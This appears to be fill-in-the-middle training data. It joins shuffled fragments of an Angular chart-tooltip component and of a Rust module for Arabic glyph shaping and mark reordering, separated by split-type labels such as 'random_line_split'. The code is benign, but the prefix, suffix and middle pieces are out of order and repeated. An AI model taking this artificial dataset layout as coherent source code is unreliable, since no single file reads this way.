if (tooltip.opacity === 0) {
tooltipEl.style.opacity = '0';
return;
}
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label;
yourDelta = delta;
} else {
communityLabel = label;
communityDelta = delta;
}
}
// console.debug(
// 'labels',
// yourLabel,
// communityLabel,
// tooltip.beforeBody,
// yourDatapoint,
// communityDatapoint,
// );
const playerSection = yourDatapoint?.formattedValue
? this.buildSection(
'player',
yourLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
yourDelta != null ? parseInt(yourDelta) : null,
yourDatapoint,
)
: '';
const communitySection = communityDatapoint?.formattedValue
? this.buildSection(
'average',
communityLabel,
this.turnLabel,
this.statLabel,
this.deltaLabel,
communityDelta != null ? parseInt(communityDelta) : null,
communityDatapoint,
)
: '';
const innerHtml = `
<div class="body">
${playerSection}
${communitySection}
</div> | `;
const tableRoot = tooltipEl.querySelector('.content');
tableRoot.innerHTML = innerHtml; | random_line_split | |
graph-with-comparison-new.component.ts | static: false }) chart: ElementRef;
lineChartData$: Observable<ChartData<'line'>>;
lineChartOptions$: Observable<ChartOptions>;
communityLabel$: Observable<string>;
yourLabel$: Observable<string>;
@Input() communityTooltip: string;
@Input() yourTooltip: string;
@Input() turnLabel = 'Turn';
@Input() statLabel = 'Stat';
@Input() deltaLabel: string;
@Input() id: string;
@Input() showDeltaWithPrevious: boolean;
@Input() set maxYValue(value: number) {
this.maxYValue$$.next(value);
}
@Input() set stepSize(value: number) {
this.stepSize$$.next(value);
}
@Input() set showYAxis(value: boolean) {
this.showYAxis$$.next(value);
}
@Input() set communityLabel(value: string) {
this.communityLabel$$.next(value);
}
@Input() set yourLabel(value: string) {
this.yourLabel$$.next(value);
}
@Input() set communityValues(value: readonly NumericTurnInfo[]) {
this.communityValues$$.next(value);
}
@Input() set yourValues(value: readonly NumericTurnInfo[]) {
this.yourValues$$.next(value);
}
private maxYValue$$ = new BehaviorSubject<number>(null);
private stepSize$$ = new BehaviorSubject<number>(null);
private showYAxis$$ = new BehaviorSubject<boolean>(true);
private communityLabel$$ = new BehaviorSubject<string>('Community');
private yourLabel$$ = new BehaviorSubject<string>('You');
private communityValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
private yourValues$$ = new BehaviorSubject<readonly NumericTurnInfo[]>(null);
constructor(
protected readonly store: AppUiStoreFacadeService,
protected readonly cdr: ChangeDetectorRef,
private readonly el: ElementRef,
) {
super(store, cdr);
}
ngAfterContentInit(): void {
this.communityLabel$ = this.communityLabel$$.pipe(this.mapData((info) => info));
this.yourLabel$ = this.yourLabel$$.pipe(this.mapData((info) => info));
this.lineChartData$ = combineLatest([
this.communityLabel$$.asObservable(),
this.yourLabel$$.asObservable(),
this.communityValues$$.asObservable(),
this.yourValues$$.asObservable(),
]).pipe(
this.mapData(([communityLabel, yourLabel, communityValues, yourValues]) => {
// Turn 0 is before any battle, so it's not really interesting for us
const community = this.removeTurnZero(communityValues || []);
const your = this.removeTurnZero(yourValues || []);
const maxTurnFromCommunity = this.getMaxTurn(community);
const maxTurnFromYour = this.getMaxTurn(your);
const lastTurn = Math.max(maxTurnFromCommunity, maxTurnFromYour);
const filledCommunity = this.fillMissingData(community, lastTurn);
const filledYour = this.fillMissingData(your, lastTurn);
// console.debug('chart data', filledCommunity, filledYour, lastTurn, community, your);
const yourData = filledYour?.map((stat) => stat.value) || [];
const communityData = filledCommunity?.map((stat) => stat.value) || [];
// TODO: missing color
const newChartData: ChartData<'line'>['datasets'] = [
{
id: 'your',
data: yourData,
label: yourLabel,
backgroundColor: 'transparent',
borderColor: '#FFB948',
delta: yourData?.length
? [
yourData[0],
...yourData.slice(1).map((n, i) => (yourData[i] == null ? null : n - yourData[i])),
]
: [],
} as any,
{
id: 'community',
data: communityData,
label: communityLabel,
backgroundColor: 'transparent',
borderColor: '#CE73B4',
delta: communityData?.length
? [
communityData[0],
...communityData
.slice(1)
.map((n, i) => (communityData[i] == null ? null : n - communityData[i])),
]
: [],
} as any,
];
const result = {
datasets: newChartData,
labels: [...Array(lastTurn + 1).keys()].filter((turn) => turn > 0).map((turn) => '' + turn),
};
return result;
}),
share(),
takeUntil(this.destroyed$),
);
const maxValue$ = combineLatest([this.maxYValue$$.asObservable(), this.lineChartData$]).pipe(
filter(([maxValue, chartData]) => !!chartData),
this.mapData(([maxYValue, chartData]) => {
const maxValue = Math.max(
...chartData.datasets.map((data) => data.data as number[]).reduce((a, b) => a.concat(b), []),
);
return !!maxYValue ? Math.max(maxYValue, maxValue) : undefined;
}),
);
this.lineChartOptions$ = combineLatest([
maxValue$,
this.stepSize$$.asObservable(),
this.showYAxis$$.asObservable(),
]).pipe(
this.mapData(([maxValue, stepSize, showYAxis]) => this.buildChartOptions(showYAxis, stepSize, maxValue)),
);
}
private removeTurnZero(input: readonly NumericTurnInfo[]): readonly NumericTurnInfo[] {
return input.filter((stat) => stat.turn > 0);
}
private fillMissingData(input: readonly NumericTurnInfo[], lastTurn: number) {
const result = [];
for (let i = 1; i <= lastTurn; i++) {
result.push(
input.find((stat) => stat.turn === i) || {
turn: i,
value: null,
},
);
}
return result;
}
private getMaxTurn(input: readonly NumericTurnInfo[]) {
return input.filter((stat) => stat.value != null).length === 0
? 0
: Math.max(...input.filter((stat) => stat.value != null).map((stat) => stat.turn));
}
private buildChartOptions(showYAxis: boolean, stepSize: number, maxYValue: number): ChartOptions {
const result: ChartOptions = {
responsive: true,
maintainAspectRatio: false,
layout: {
padding: 0,
},
elements: {
point: {
radius: 0,
},
},
plugins: {
datalabels: {
display: false,
},
tooltip: {
enabled: false,
mode: 'index',
intersect: false,
position: 'nearest',
backgroundColor: '#CE73B4',
titleColor: '#40032E',
titleFont: {
family: 'Open Sans',
},
bodyColor: '#40032E',
bodyFont: {
family: 'Open Sans',
},
padding: 5,
caretPadding: 2,
caretSize: 10,
cornerRadius: 0,
displayColors: false,
callbacks: {
beforeBody: (items: TooltipItem<'line'>[]): string | string[] => {
return items?.map(
(item: any) =>
((item?.dataset as any)?.id ?? '') +
'|||' +
(item?.dataset?.label ?? '') +
'|||' +
item?.dataset?.delta[item.dataIndex],
);
},
},
external: (context) => {
const tooltipId = 'chartjs-tooltip-stats-' + this.id;
const chartParent = this.chart.nativeElement.parentNode;
let tooltipEl = document.getElementById(tooltipId);
if (!tooltipEl) {
tooltipEl = document.createElement('div');
tooltipEl.id = tooltipId;
tooltipEl.classList.add('tooltip-container');
tooltipEl.innerHTML = `
<div class="stats-tooltip">
<svg class="tooltip-arrow" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 9">
<polygon points="0,0 8,-9 16,0"/>
</svg>
<div class="content"></div>
</div>`;
chartParent.appendChild(tooltipEl);
}
// Hide if no tooltip
const tooltip = context.tooltip;
if (tooltip.opacity === 0) |
const yourDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 0);
const communityDatapoint = tooltip.dataPoints.find((dataset) => dataset.datasetIndex === 1);
let yourLabel: string = null;
let yourDelta: string = null;
let communityLabel: string = null;
let communityDelta: string = null;
for (const bBody of tooltip.beforeBody) {
const [id, label, delta] = bBody.split('|||');
if (id === 'your') {
yourLabel = label | {
tooltipEl.style.opacity = '0';
return;
} | conditional_block |
arabic.rs | ::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
} | #[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn test_artificial() {
let cs = vec![
'\u | }
| random_line_split |
arabic.rs | ::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() |
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
}
}
#[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn test_artificial() {
let cs = vec![
| {
continue;
} | conditional_block |
arabic.rs | ::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
}
}
#[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn | () {
let cs = vec![
'\ | test_artificial | identifier_name |
arabic.rs |
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
